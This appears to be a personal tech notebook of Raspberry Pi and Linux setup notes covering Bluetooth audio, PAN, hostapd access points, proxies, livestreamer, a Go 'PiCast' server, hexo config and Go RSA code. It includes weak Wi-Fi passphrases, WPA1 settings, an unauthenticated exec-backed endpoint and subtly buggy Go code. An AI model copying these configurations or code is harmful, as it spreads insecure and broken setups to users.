sudo service minidlna start
sudo /etc/init.d/minidlna start
sudo service minidlna status -l
sudo systemctl status minidlna -l

http://mkitby.com/2015/11/09/raspberry-pi-nas-upnp-dlna/
http://cheng-min-i-taiwan.blogspot.hk/2013/02/raspberry-pi-dlna.html

Install the command line media player by `sudo apt-get install omxplayer`, then play the music from ssh command line.

Control the playback via such app “OMX Remote” or “Raspicast” which can be download from google play.

https://codeyarns.com/2016/09/09/how-to-cast-to-raspberry-pi-using-raspicast/
https://codeyarns.com/2016/03/20/omxplayer/
https://codeyarns.com/2016/09/09/omx-remote/

Connect to bluetooth speaker

hcitool dev
hciconfig - show BD address of Pi
hciconfig -a hci0
rfkill unblock bluetooth or rfkill unblock all // If bluetoothctl cannot find any controller, the bluetooth device may be blocked. Try to unblock it using rfkill
sudo bluetoothctl
# scan on (find the BD address)
# scan off
# agent on
# default-agent
# pair A0:E4:53:20:77:79
# trust A0:E4:53:20:77:79
# connect A0:E4:53:20:77:79
# list
# devices
# show
# disconnect A0:E4:53:20:77:79

Play music with the bluetooth speaker(Phillips BT3000) using A2DP profile

Check if pulseaudio is running (Reference https://wiki.archlinux.org/index.php/PulseAudio_(%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87))

ps aux | grep pulseaudio
=>
/usr/bin/start-pulseaudio-X11
pulseaudio --start
(PulseAudio would run along with X11 desktop startup)

List the sound cards pacmd list-cards. Test audio output of left and right channal speaker-test -c 2
List the audio output pacmd list-sinks or pactl list sinks short. Check the default audio sink aplay -L
List the audio input pacmd list-sources or pactl list sources short
Set the Bluetooth speaker becomes default sink pacmd set-default-sink 1 (index 1 is like bluez_sink.xx_xx_xx_xx_xx_xx)
Turn up the PulseAudio volume pacmd set-sink-volume 0 65537 Or turn up the ALSA volume amixer set Master 100% or amixer cset numid=3 100%
Reference:
http://youness.net/raspberry-pi/bluetooth-headset-raspberry-pi
http://www.crazy-audio.com/2014/09/pulseaudio-on-the-raspbery-pi/
Show soundcard information aplay -L or aplay -l, play a music aplay -v -V stereo HANA.mp3

Stream music to RPi from mobile phone connecting with bluetooth (Optional, maybe RPi can automatically detect the audio source (bluetooth) and sink(3.5mm audio jack)

pactl load-module module-loopback source=bluez_source.B8_C6_8E_52_E8_CA sink=alsa_output.platform-bcm2835_AUD0.0.analog-stereo
Reference:
http://kmonkey711.blogspot.hk/2012/12/a2dp-audio-on-raspberry-pi.html
http://www.dreamincode.net/forums/blog/62/entry-4272-sound-on-an-arch-linux-arm-raspberry-pi/

Bluetooth stack

Controller stack
HCI(Host Controller Interface)
Protocol stack
- L2CAP (Logical Link Control and Adaptation Protocol) -
- SDP (Service Discovery protocol) - scan devices
- RFCOMM (Radio frequency communication) - on top of L2CAP, providing emulated RS-232 serial ports
- BNEP (Bluetooth network encapsulation protocol) - on top of L2CAP, for personal area networking (PAN) profile
Profiles
- A2DP (Advanced Audio Distribution Profile) - for headset
- DUN (Dial-up Networking Profile) - for accessing internet by dialing up on a modem
https://en.wikipedia.org/wiki/List_of_Bluetooth_protocols
https://en.wikipedia.org/wiki/List_of_Bluetooth_profiles

Setup PAN

Install bridge-utils sudo apt install bridge-utils
Install python-dbus sudo apt install python-dbus
Download bt-pan script wget https://raw.githubusercontent.com/mk-fg/fgtk/master/bt-pan

Setup bpen bridge

sdptool add NAP # advertise NAP service, but found sdptool does not work in bluez 5
brctl show bnep
sudo brctl addbr bnep
sudo brctl setfd bnep 0
sudo brctl stp bnep off
sudo ip addr add 192.168.12.3/24 dev bnep
sudo ip link set bnep up

Setup server via dbus

1
2

dbus-send --system --dest=org.bluez --print-reply --type=method_call /org/bluez/hci0 org.bluez.NetworkServer1.Unregister string:'nap'
dbus-send --system --dest=org.bluez --print-reply --type=method_call /org/bluez/hci0 org.bluez.NetworkServer1.Register string:'nap' string:'bnep'

Reference

dbus-send --system --type=method_call --print-reply --dest=org.bluez /org/bluez org.freedesktop.DBus.Introspectable.Introspect
dbus-send --system --dest=org.bluez --type=method_call --print-reply /org/bluez/hci0 org.freedesktop.DBus.Introspectable.Introspect
dbus-send --system --type=method_call --print-reply=literal --dest=org.bluez /org/bluez/hci0 org.freedesktop.DBus.Properties.Set string:org.bluez.Adapter1 string:Powered variant:boolean:false
dbus-send --system --type=method_call --print-reply --dest=org.bluez /org/bluez/hci0 org.freedesktop.DBus.Properties.Get string:org.bluez.Adapter1 string:Address
dbus-send --system --type=method_call --print-reply --dest=org.freedesktop.DBus / org.freedesktop.DBus.ListNames

//below script is from http://rrbluetoothx.blogspot.hk/2016/06/rr-bluetooth-list-dbus-services-buses.html
dbus-send --system            \
  --dest=org.freedesktop.DBus \
  --type=method_call          \
  --print-reply               \
  /org/freedesktop/DBus       \
  org.freedesktop.DBus.ListNames

//below script is from https://gist.github.com/studiofuga/5262efb95968b02a365d
* Making an adapter discoverable (check that rfkill is enabled, otherwise /org/bluez/hci0 will not be available)
dbus-send --system --dest=org.bluez --print-reply /org/bluez/hci0 \
  org.freedesktop.DBus.Properties.Set \
  string:org.bluez.Adapter1 string:Discoverable variant:boolean:true
  
* Changing the discoverable timeout. Default is 180s.

dbus-send --system --dest=org.bluez --print-reply /org/bluez/hci0 \
  org.freedesktop.DBus.Properties.Set \
  string:org.bluez.Adapter1 string:DiscoverableTimeout variant:uint32:0

Or Run bt server ./bt-pan --debug server bnep

Run bt client ./bt-pan --debug client 00:11:67:55:8F:69
https://blind.guru/tag/bluetooth-pan.html
http://blog.fraggod.net/2015/03/28/bluetooth-pan-network-setup-with-bluez-5x.html (provide the bt-pan script)
http://www.agouros.de/Elwood/Bluetooth.html
http://trac.gateworks.com/wiki/wireless/bluetooth (very detail)
http://wiki.openmoko.org/wiki/Manually_using_Bluetooth#Bluetooth_networking_with_a_Linux_system_-_More_secure_way

sshfs

Install sshfs sudo apt-get install sshfs

Mount the directory by

1
2
3

sshfs -o allow_other -o kernel_cache -o auto_cache -o reconnect \
  -o compression=no -o cache_timeout=600 -o ServerAliveInterval=15 \
  support@192.168.42.1:/tmp/song /home/pi/minidlna

Refresh the list to load new songs from sshfs directory by minidlnad -R
Reload minidlna service sudo service minidlna force-reload
Unmount directory fusermount -u ~/minidlna

tinyproxy and iptables

1 2	sudo apt-get install tinyproxy sudo service tinyproxy start

After install tinyproxy in my chromebook, found RPi cannot connect to 8888 port of tinyproxy(nc -l 8888 in chromebook and fail to connect by nc 192.168.42.9 8888 in RPi), which is caused by iptables rule. Then add it,

Save the rules sudo iptables-save > iptables.rules
Add the rule for proxy working sudo iptables -A INPUT -s 192.168.42.0/24 -i wlan0 -p tcp -dport 8888 -j ACCEPT
Restore the rules sudo iptables-restore < iptables.rules

mpg321, mpg123, speedtest-cli (just mark this, this is nothing)

Check the release or other useful information

lsb_release -a
vcgencmd version

cat /etc/os-release
cat /etc/rpi-issue
cat /etc/debian_version

cat /proc/cpuinfo
cat /proc/meminfo
cat /proc/version

Show various hardware information to RPi

vcgencmd commands

vcgencmd measure_clock arm
vcgencmd measure_clock core

vcgencmd get_config int

vcgencmd get_mem arm
vcgencmd get_mem gpu

2017-01-16

2017-01-16

Setup Display On Rpi

Xorg Display Server

1 2	sudo apt-get install --no-install-recommends xserver-xorg sudo apt-get install --no-install-recommends xinit (for command startx to start the Xorg Display Server)

Desktop Environment and Openbox Window Manager

1
2

sudo apt-get install lxde-core
sudo apt-get install lxappearance (Optional, for changing the look of applications such as panels, icons, progress bars, cursors, and so on, give yourself more customization abilities)

sudo apt-get install lightdm
if no login manager was installed, then just login via the command line! At anytime, you can launch the Xorg Display Server by typing in:
startx

Ubuntu <=> RPi

tightvncserver

Install tightvncserver sudo apt-get install tightvncserver (For RPi to install tightvncserver, it needs to install xfonts-base)
Fix gray screen when login to ubuntu 14.04. Update file /.vnc/xstartup as below

#!/bin/sh
def
export XKL_XMODMAP_DISABLE=1
unset SESSION_MANAGER
unset DBUS_SESSION_BUS_ADDRESS
 
gnome-panel &
gnome-settings-daemon &
metacity &
nautilus &
gnome-terminal &

Start vnc server by tightvncserver or with more options vncserver :0 -geometry 1920x1080 -depth 24
tightvncserver == vncserver
Stop vnc server by tightvncserver -kill :1
3 .Download tvnjviewer-2.8.3-bin-gnugpl and connect to vnc server by java -jar tightvnc-jviewer.jar

x2x

On RPi

sudo apt-get install x2x
make sure X11Forwarding yes in /etc/ssh/sshd_config
On Workstation
ssh -X pi@192.168.42.100 x2x -west -to :0 (-west, -north, -south) (-to :X <= echo $DISPLAY on RPi)

Another option xdotool

DISPLAY=:0 xdotool getactivewindow key Down
DISPLAY=:0 xdotool getactivewindow type 'your text here'

1
2
3

xdotool click 1` 按下滑鼠左鍵（左鍵：1、滾輪：2、右鍵：3、滾輪上/下：4/5）
xdotool mousedown
xdotool mouseup

Android <=> RPi

Install simplecomputerremote on RPi

1
2
3

# wget http://philproctor.github.io/SimpleComputerRemote/downloads/simplecomputerremote_1.2_armhf.deb
# sudo dpkg -i simplecomputerremote_1.2_armhf.deb
# /opt/rekap/SimpleComputerRemote

Configure simplecomputerremote to run after desktop environment startup

1
2
3

mkdir /home/pi/.config/autostart (if the directory does not exist.)
cd /home/pi/.config/autostart
sudo nano SimpleComputerRemote.desktop

Add following line in SimpleComputerRemote.desktop file

[Desktop Entry]
name=SimpleComputerRemote
GenericName=Remote Control
Comment=Allow remote control using Simple Computer Remote
Exec=/opt/rekap/SimpleComputerRemote
Terminal=False
Type=Application

As the app no longer exists in Google Play, you should need to download the apk from other market and install com.rekap.remote.apk on Android. Open the app, go to “Settings > Select Server” and you will see RPi on the list.

Reference

Display
https://www.raspberrypi.org/forums/viewtopic.php?f=66&t=133691

x2x
http://raspberrypi.stackexchange.com/questions/4253/forward-mouse-and-keyboard-input-to-x-session
http://linuxcommando.blogspot.hk/2014/07/share-keyboard-and-mouse-on-two-x.html
https://help.ubuntu.com/community/X2xHowto
https://github.com/dottedmag/x2x

Simple Computer Remote
https://www.raspberrypi.org/forums/viewtopic.php?f=27&t=40797
http://sanjosetech.blogspot.hk/2013/10/raspberry-pi-remote-control.html
http://randomcompstuff.blogspot.hk/2014/07/how-to-install-simple-computer-remote.html
Fix grey screen on connecting VNC server when setting up Ubuntu 14.04 with VNC
quadcopter control by RPi

2017-01-13

2017-01-13

Install Hostapd On Rpi

List all enabled services.

systemctl list-unit-files | grep enabled

List all running services.

systemctl | grep running

Get sshd to start on boot as it is disabled by default

sudo systemctl enable ssh.socket

Get dhcpd to stop on boot as it need more time to boot

sudo systemctl disable dhcpcd.service

Install hostapd

git clone https://github.com/lostincynicism/hostapd-rtl8188
sudo apt-get install libnl-3-dev # Fix fatal-error-netlink-genl-genl-h-no-such-file-or-directory
sudo apt-get install libnl-genl-3-dev
cd hostapd-rtl8188/hostapd && sudo make all

Add following lines to /boot/my-hostapd.sh file

#!/bin/sh -
#ifconfig wlan0 192.168.42.100 up
#sleep 0.5
#wpa_cli -i wlan0 terminate # Stop wpa_supplicant process
#sleep 0.5
/home/pi/hostapd-rtl8188/hostapd/hostapd /boot/hostadp.8188eu.conf

For ip configuration, it is more applicable to update `/etc/network/interfaces` file, but for Jessie Debian, it needs to disable dhcpd first refering to http://raspberrypi.stackexchange.com/questions/37920/how-do-i-set-up-networking-wifi-static-ip-address and https://www.raspberrypi.org/documentation/hardware/raspberrypi/bootmodes/net_tutorial.md

1 2	sudo systemctl disable dhcpcd sudo systemctl enable networking

auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet static
  address 192.168.42.100
  netmask 255.255.255.0

#allow-hotplug wlan0
#iface wlan0 inet manual
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
#iface default inet dhcp

Settings in /boot/hostadp.8188eu.conf

interface=wlan0
driver=rtl871xdrv
ssid=RasPi-AP
hw_mode=g
channel=1
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=1
wpa_pairwise=CCMP
#wpa=2
#rsn_pairwise=TKIP CCMP
wpa_passphrase=123456789
wpa_key_mgmt=WPA-PSK

Settings in /lib/systemd/system/hostapd.service as below

[Unit]
Description=My Hostapd Service
After=multi-user.target

[Service]
Type=idle
ExecStart=/boot/my-hostapd.sh

[Install]
WantedBy=multi-user.target

1
2
3

sudo chmod 644 /lib/systemd/system/hostapd.service
sudo systemctl daemon-reload  # 重载所有修改过的配置文件
sudo systemctl enable hostapd.service

Check the hostapd.service

sudo systemctl status hostapd.service

Start/Stop/Restart the hostapd.service

1
2
3

sudo systemctl start hostapd.service
sudo systemctl stop hostapd.service
sudo systemctl restart hostapd.service

Run tmux in Ubuntu

options in /etc/wpa_supplicant/wpa_supplicant.conf

ctrl_interface=/var/run/wpa_supplicant
update_config=1

network={
    ssid="RasPi-AP"
    psk="iplababab1411"
}

Notes

In one pane, run sudo wpa_supplicant -Dnl80211,wext -iwlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
The option of ‘wext’ is the 8188eu driver for wpa_supplicant
In other pane, run sudo wpa_cli or sudo iwlist wlan0 scan
iw command for “nl80211”, iwconfig/iwlist(wireless_tools) for “wext” (rtl871xdrv)

wpa_supplicant - works with both wext and nl80211.

1
2
3

iwconfig wlan0 => iw dev wlan0 link (Getting info on wlan0)
iwconfig wlan0 essid foo => iw wlan0 connect foo (Connecting to an open network)
iwconfig wlan0 essid off => iw wlan0 ibss leave (Leave an IBSS (ad-hoc network))

Install udhcpd

sudo apt-get install udhcpd

Settings in /etc/udhcpd.conf

start 192.168.42.2 # This is the range of IPs that the hostspot will give to client devices.
end 192.168.42.20
interface wlan0 # The device uDHCP listens on.
max_leases 10
remaining yes
opt dns 8.8.8.8 4.2.2.2 # The DNS servers client devices will use.
opt subnet 255.255.255.0
opt router 192.168.42.100 # The Pi's IP address on wlan0 which we will set up shortly.
opt lease 864000 # 10 day DHCP lease time in seconds

Enable dhcpd #DHCPD_ENABLED="no" in /etc/default/udhcpd

Start service

1 2	sudo systemctl restart hostapd.service sudo service udhcpd restart

Check result
service udhcpd status Or
cat /var/log/syslog | grep udhcpd
Get the udhcpd to start on boot
sudo update-rc.d udhcpd enable

Reference
http://www.raspberrypi-spy.co.uk/2015/10/how-to-autorun-a-python-script-on-boot-using-systemd/
https://wiki.archlinux.org/index.php/WPA_supplicant
https://wiki.archlinux.org/index.php/Wireless_network_configuration
http://elinux.org/RPI-Wireless-Hotspot

2017-01-11

2017-01-11

Create SoftAP with Hostapd on Ubuntu and Rpi.md

In Ubuntu 14.04

Check whether the module 8188eu is load `lsmod|grep 8188` or `lsusb`

Download and compile latest hostapd with RTL8188 drivers

git clone https://github.com/lostincynicism/hostapd-rtl8188
sudo apt-get install libnl-3-dev # Fix fatal-error-netlink-genl-genl-h-no-such-file-or-directory
sudo apt-get install libnl-genl-3-dev
cd hostapd-rtl8188/hostapd && sudo make all

interface=wlan0
driver=rtl871xdrv
ssid=Soft-AP
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
#wpa=1
#wpa_pairwise=CCMP
wpa=2
rsn_pairwise=TKIP CCMP
wpa_passphrase=123456789
wpa_key_mgmt=WPA-PSK

Fix “Cannot find the ssid problem”

1 2	sudo nmcli nm wifi off sudo rfkill unblock wlan # disable power saving mode, use sudo nmcli radio wifi off if Error: Object 'nm' is unknown then use this instead:

Following maybe not work but for reference

sudo systemctl disable NetworkManager.service 
sudo systemctl enable networking.service

sudo systemctl status wpa_supplicant.service

sudo systemctl --force stop wpa_supplicant.service
wpa_cli -i wlan0 terminate # stop wpa_supplicant program as it is conflicted with hostapd

Start hostapd

1
2
3

cd hostapd-rtl8188/hostapd
sudo ./hostapd -dd /usr/share/doc/hostapd/examples/hostadp.8188eu.conf
sudo ifconfig wlan0 192.168.42.1

In Raspberry Pi

Configure IP `sudo ifconfig wlan0 192.168.42.100`

Scan ssid `iwlist wlan0 scan`

Connect to ssid “Soft-AP”

# wpa_cli
>scan
>scan_results
>add_network
>set_network 0 ssid "Soft-AP"
>set_network 0 psk "123456789"
>enable_network 0
>quit
# ping 192.168.42.1 or iwconfig


wpa_cli -i wlan0 terminate (關閉wpa_supplicant)
wpa_cli -i wlan0 save_config (儲存寫入到wpa_supplicant.conf中，否責變更無效) need "update_config=1" in /etc/wpa_supplicant/wpa_supplicant.conf
wpa_cli -i wlan0 select_network (選擇不同的AP，id為AP代號0,1,2,3...)
wpa_cli -i wlan0 disable_network
wpa_cli -i wlan0 remove_network (刪除AP資訊)
wpa_cli -i wlan0 disconnect (斷線)
wpa_cli -i wlan0 reconnect (重新連線)
wpa_cli -i wlan0 list_networks (查看wpa_supplicant.conf檔裡的設定)
wpa_cli -i wlan0 interface (查看有那些無線網卡介面)

Others

In Ubuntu

Set proxy java -cp lib/log4j-1.2.16.jar:lib/jboss-common-logging-spi.jar:lib/netty.jar org.jboss.netty.example.proxy.HexDumpProxy 8081 10.13.135.115 8080

In RaspPi

Setting Up apt-get with proxy. Add file proxy.conf in “/etc/apt/“ with content Acquire::http::Proxy "http://192.168.42.1:8081/";

Setting Up http proxy by

1 2	export http_proxy=http://192.168.42.1:8081/ export https_proxy=http://192.168.42.1:8081/

Run sudo apt-get install apt-transport-https if problem “E: The method driver /usr/lib/apt/methods/https could not be found.” occurs when sudo apt-get update
Install mpv from https://nwgat.ninja/quick-easy-compiling-mpv-for-raspberry-pi/
Install livestreamer

Download setuptools from https://pypi.python.org/pypi/setuptools#downloads
Install setuptools python setup.py install and sudo -E easy_install livestreamer
Test the audio livestreamer --https-proxy=http://192.168.42.1:8081 --http-proxy=http://192.168.42.1:8081 hlsvariant://http://rthkaudio1-lh.akamaihd.net/i/radio1_1@355864/master.m3u8 best -p mpv
Change the volumn by
4.1 amixer controls to show the Master Playback Volume
4.2 Get details of the master playback volume control by amixer cget numid=3, it shows a pair of volume values=65536,65536(for left and right channels)
alsamixer, save volumn level via sudo alsactl store
amixer cset numid=1 -- 80% or amixer cset numid=3 80% Or amixer set Master 100%
4.3 To mute the sound by amixer cset numid=4 off (Control 4), this also affects the volume values on control 3
Reference http://blog.scphillips.com/posts/2013/01/sound-configuration-on-raspberry-pi-with-alsa/
Set audio output device amixer cset numid=3 N (N=0=auto, 1=analog, 2=hdmi)

Start openssh-server sudo service ssh start
Install openvpn sudo apt-get install openvpn
Install adb and fastboot by sudo apt-get install android-tools-adb android-tools-fastboot

Configure udev service for detecting the pluged phone

1
2
3

sudo wget -O /etc/udev/rules.d/51-android.rules https://raw.githubusercontent.com/NicolasBernaerts/ubuntu-scripts/master/android/51-android.rules
sudo chmod a+r /etc/udev/rules.d/51-android.rules
sudo service udev restart

Plug the mobile and mount the sdcard by sudo mount /dev/sda1 /mnt
Check the disk by
1
2
3
sudo fdisk -l /dev/sda
sudo lsblk
df -h

USB tethering

1 2	adb forward tcp:41927 tcp:41927 sudo openvpn azilink.ovpn

Write PiCast application with golang

package main

import (
	"fmt"
	"github.com/gorilla/mux"
	"io/ioutil"
	"net/http"
	"os"
	"os/exec"
	"strings"
	"syscall"
)

func main() {
	r := mux.NewRouter()
	r.HandleFunc("/", Home)
	//r.HandleFunc("/yt-stream/{args}", Youtube)
	r.HandleFunc("/yt-stream", Youtube)

	bind := fmt.Sprintf("%s:%s", os.Getenv("HOST"), os.Getenv("PORT"))
	fmt.Printf("listening on %s...\n", bind)
	err := http.ListenAndServe(bind, r)
	if err != nil {
		panic(err)
	}
}

func Home(res http.ResponseWriter, req *http.Request) {
	fmt.Fprint(res, "Welcome to PiCAST! In the URL, type what you want to do...\n")
}

func Youtube(res http.ResponseWriter, req *http.Request) {
	body := readReqBody(req)
	url := body["url"]

	if url == "" {
		args := body["args"]
		url = "https://www.youtube.com/watch?v=" + args
	}

	p := body["proxy"]

	http_proxy := ""
	https_proxy := ""

	if p != "" {
		http_proxy = "--https-proxy=" + p
		https_proxy = "--http-proxy=" + p
	}

	args := []string{http_proxy, https_proxy, url, "best", "--player=mpv"}
	fmt.Println(args)

	run(args)
}

func run(args []string) {
    exec.Command("killall livestreamer").Run()

	binary, lookErr := exec.LookPath("livestreamer")
	if lookErr != nil {
		panic(lookErr)
	}

	env := os.Environ()

	execErr := syscall.Exec(binary, args, env)
	if execErr != nil {
		fmt.Println("execErr", execErr)
	}
}

func runOld(args []string) {
	cmd := exec.Command("livestreamer", args...)
	fmt.Println(cmd.Path)
	fmt.Println(cmd.Args)
	fmt.Println(cmd.Env)

	if err := cmd.Start(); err != nil {
		fmt.Printf("cmd.Start: %v\n", err)
	}

	if err := cmd.Wait(); err != nil {
		if exiterr, ok := err.(*exec.ExitError); ok {
			if status, ok := exiterr.Sys().(syscall.WaitStatus); ok {
				fmt.Printf("Exit Status: %d\n", status.ExitStatus())
			}
		} else {
			fmt.Printf("cmd.Wait: %v\n", err)
		}
	}
}

func readReqBody(req *http.Request) map[string]string {
	body, _ := ioutil.ReadAll(req.Body)
	// Info.Println("body = ", string(body))
	m := make(map[string]string)

	content := strings.Split(string(body), "&")
	for _, c := range content {
		p := strings.Split(c, "=")
		if len(p) == 2 {
			m[p[0]] = p[1]
		}
	}
	return m
}

Cross compile this web application in linux

1 2	env GOOS=linux GOARCH=arm go build -ldflags="-s -w" main.go scp -i id_rsa main pi@192.168.42.100:/home/pi/

Install tmux on ubuntu
sudo apt-get install tmux

ctrl+b % - split window vertically
ctrl+b " - split window horizontally
ctrl+b o - Goto next pane
ctrl+b c - Create new window
ctrl+b w - List all windows 
ctrl+b l - Move to the previously selected window

Reference

ADB FIFO example
USB tethering
https://github.com/lanceseidman/PiCAST

2017-01-09

2017-01-09

Play audio/video using livestreamer

Download livestreamer-v1.12.2-win32.zip from http://docs.livestreamer.io/install.html#windows-binaries

Play stream

City_Snapshot from rthk

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 hlsvariant://http://stmw.rthk.hk/aod/_definst_/radio/archive/radio1/City_Snapshot/mp3/mp3:20161129.mp3/playlist.m3u8 best -p "C:\Program Files\VideoLAN\VLC\vlc.exe" --verbose-player --stream-types=hls

RTHK Radio 1

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 hlsvariant://http://rthkaudio1-lh.akamaihd.net/i/radio1_1@355864/master.m3u8 best -p C:\Users\User\Downloads\mpv-x86_64-20170102-git-8e41f31\mpv.exe

RTHK Radio 2

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 hlsvariant://http://rthkaudio2-lh.akamaihd.net/i/radio2_1@355865/master.m3u8 best -p C:\Users\User\Downloads\mpv-x86_64-20170102-git-8e41f31\mpv.exe

Play 香港卫视

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 hlsvariant://http://live.hkstv.hk.lxdns.com/live/hks/playlist.m3u8 best -p "C:\Program Files\VideoLAN\VLC\vlc.exe"

Play Faded from Alan Walker

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 https://www.youtube.com/watch?v=60ItHLz5WEA best -p "C:\Program Files\VideoLAN\VLC\vlc.exe"

Play RTMP stream (Need rtmpdump.exe in the current folder)

livestreamer --https-proxy=http://proxy1.scig.gov.hk:8080 --http-proxy=http://proxy1.scig.gov.hk:8080 rtmp://live.hkstv.hk.lxdns.com/live/hks best -p "C:\Program Files\VideoLAN\VLC\vlc.exe"

Play by external player

livestreamer --https-proxy=http://10.13.135.115:8080 --http-proxy=http://10.13.135.115:8080 hlsvariant://http://stmw.rthk.hk/aod/_definst_/radio/archive/radio1/City_Snapshot/mp3/mp3:20161214.mp3/playlist.m3u8 best --player-external-http --player-external-http-port=12345 --verbose-player --stream-types=hls
livestreamer --https-proxy=http://10.13.135.115:8080 --http-proxy=http://10.13.135.115:8080 hlsvariant://http://live.hkstv.hk.lxdns.com/live/hks/playlist.m3u8 best --player-external-http --player-external-http-port=12345 --verbose-player --stream-types=hls

Some player: gstreamer, ffplay, vlc, wmplayer, mpc-hc, mpv, potplayer

2016-11-08

2016-11-08

Install Oracle ODBC Driver for Crystal Report

Install Oracle ODBC Driver in Windows 7(64-bit)

Try to install OracleXE 32-bit and 64-bit version to install the odbc driver for starting Crystal Report but fail.

And fail to install ODAC to fix 32bit odbc driver for Crystal Report

Fix

Download instantclient-odbc-nt-11.2.0.2.0 and instantclient-basic-nt-11.2.0.2.0, extract them to the same folder, run
odbc_install.exe
Add the TNS_ADMIN environment variable indicating the path of tnsnames.ora file such as c:\oracle\11.2.0\CLIENT\network\admin
Run c:\windows\SysWOW64\odbcad32.exe to configure DSN by choosing a driver which like instant_client_11, rather than calling %windir%\system32\odbcad32.exe to install the driver.

Reference

https://itkbs.wordpress.com/2014/07/28/how-to-install-odbc-driver-for-oracle-in-windows-7/

2016-11-04

2016-11-04

hexo config and light theme config

For migration in different machine, drop down the config as below

Requirements

Node.js & Git
npm install -g hexo-cli
npm install hexo --save
npm install hexo-deployer-git --save

Create blog folder

hexo init

git clone my-blog.git from bitbucket into source\_posts

git clone --depth 1 https://github.com/hexojs/hexo-theme-light themes/light

hexo g # generate page
hexo s # serve page
hexo d # deploy to github page

_config.yml of hexo

# Hexo Configuration
## Docs: https://hexo.io/docs/configuration.html
## Source: https://github.com/hexojs/hexo/

# Site
title: My Blog
subtitle:
description: My Blog
author: Forrest Wan
language: en
timezone: ''

# URL
## If your site is put in a subdirectory, set url as 'http://yoursite.com/child' and root as '/child/'
url: https://l1z2g9.github.io
root: /
permalink: :year/:month/:day/:title/
permalink_defaults:
pretty_urls:
  trailing_index: true # Set to false to remove trailing 'index.html' from permalinks
  trailing_html: true # Set to false to remove trailing '.html' from permalinks

# Directory
source_dir: source
public_dir: public
tag_dir: tags
archive_dir: archives
category_dir: categories
code_dir: downloads/code
i18n_dir: :lang
skip_render:

# Writing
new_post_name: :title.md # File name of new posts
default_layout: post
titlecase: false # Transform title into titlecase
external_link:
  enable: true # Open external links in new tab
  field: site # Apply to the whole site
  exclude: ''
filename_case: 0
render_drafts: false
post_asset_folder: false
relative_link: false
future: true
highlight:
  enable: true
  line_number: true
  auto_detect: true
  tab_replace: ''
  wrap: true
  hljs: false
prismjs:
  enable: false
  preprocess: true
  line_number: true
  tab_replace: ''

# Home page setting
# path: Root path for your blogs index page. (default = '')
# per_page: Posts displayed per page. (0 = disable pagination)
# order_by: Posts order. (Order by date descending by default)
index_generator:
  path: '/'
  per_page: 0
  order_by: -date

# Category & Tag
default_category: uncategorized
category_map:
tag_map:

# Metadata elements
## https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta
meta_generator: true

# Date / Time format
## Hexo uses Moment.js to parse and display date
## You can customize the date format as defined in
## http://momentjs.com/docs/#/displaying/format/
date_format: YYYY-MM-DD
time_format: HH:mm:ss
## updated_option supports 'mtime', 'date', 'empty'
updated_option: 'mtime'

# Pagination
## Set per_page to 0 to disable pagination
per_page: 0
pagination_dir: page

# Include / Exclude file(s)
## include:/exclude: options only apply to the 'source/' folder
include:
exclude:
ignore:

# Extensions
## Plugins: https://hexo.io/plugins/
## Themes: https://hexo.io/themes/
theme: light

# Deployment
## Docs: https://hexo.io/docs/one-command-deployment
deploy:
  type: git
  repo: https://github.com/l1z2g9/l1z2g9.github.io

_config.yml under folder themes\light_config.yml

menu:
  Home:
  Archives: archives

widgets:
- search
- category
- tag

excerpt_link: Read More

twitter:
  username:
  show_replies: false
  tweet_count: 5

addthis:
  enable: false
  pubid:
  facebook: true
  twitter: true
  google: true
  pinterest: true

fancybox: false

google_analytics:
rss:

comment_provider: facebook
# Facebook comment
facebook:
  appid: 123456789012345
  comment_count: 5
  comment_width: 840
  comment_colorscheme: light

2016-11-04

2016-11-04

RSA Encrypt Decrypt with Golang

https://github.com/jasondavies/jsbn && http://www-cs-students.stanford.edu/~tjw/jsbn/rsa.html
http://stackoverflow.com/questions/36450743/go-how-to-set-rsa-publickey-modulus-from-string

package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha1"
	"fmt"
	"io"
	"os"
)

func main() {

	// generate private key
	privatekey, err := rsa.GenerateKey(rand.Reader, 1024)

	if err != nil {
		fmt.Println(err.Error)
		os.Exit(1)
	}

	D := privatekey.D //private exponent
	Primes := privatekey.Primes
	PCValues := privatekey.Precomputed

	// Note : Only used for 3rd and subsequent primes
	//CRTVal := privatekey.Precomputed.CRTValues

	fmt.Println("Private Key : ", privatekey)
	fmt.Println()
	fmt.Println("Private Exponent : ", D.String())
	fmt.Println()
	fmt.Printf("Primes : %s %s \n", Primes[0].String(), Primes[1].String())
	fmt.Println()
	fmt.Printf("Precomputed Values : Dp[%s] Dq[%s]\n", PCValues.Dp.String(), PCValues.Dq.String())
	fmt.Println()
	fmt.Printf("Precomputed Values : Qinv[%s]", PCValues.Qinv.String())
	fmt.Println()

	// Note : Only used for 3rd and subsequent primes
	//fmt.Printf("CRTValues : Exp[%s]\n Coeff[%s]\n R[%s]\n", CRTVal[2].Exp.String(), CRTVal[2].Coeff.String(), CRTVal[2].R.String())

	// Note : if you want to have multi primes,
	//        use rsa.GenerateMultiPrimeKey() function instead of
	//        rsa.GenerateKey() function
	//        see http://golang.org/pkg/crypto/rsa/#GenerateMultiPrimeKey

	// http://golang.org/pkg/crypto/rsa/#PrivateKey.Precompute
	privatekey.Precompute()

	// http://golang.org/pkg/crypto/rsa/#PrivateKey.Validate
	err = privatekey.Validate()

	if err != nil {
		fmt.Println(err.Error)
		os.Exit(1)
	}

	var publickey *rsa.PublicKey
	publickey = &privatekey.PublicKey
	N := publickey.N // modulus
	E := publickey.E // public exponent

	fmt.Println("Public key ", publickey)
	fmt.Println()
	fmt.Println("Public Exponent : ", E)
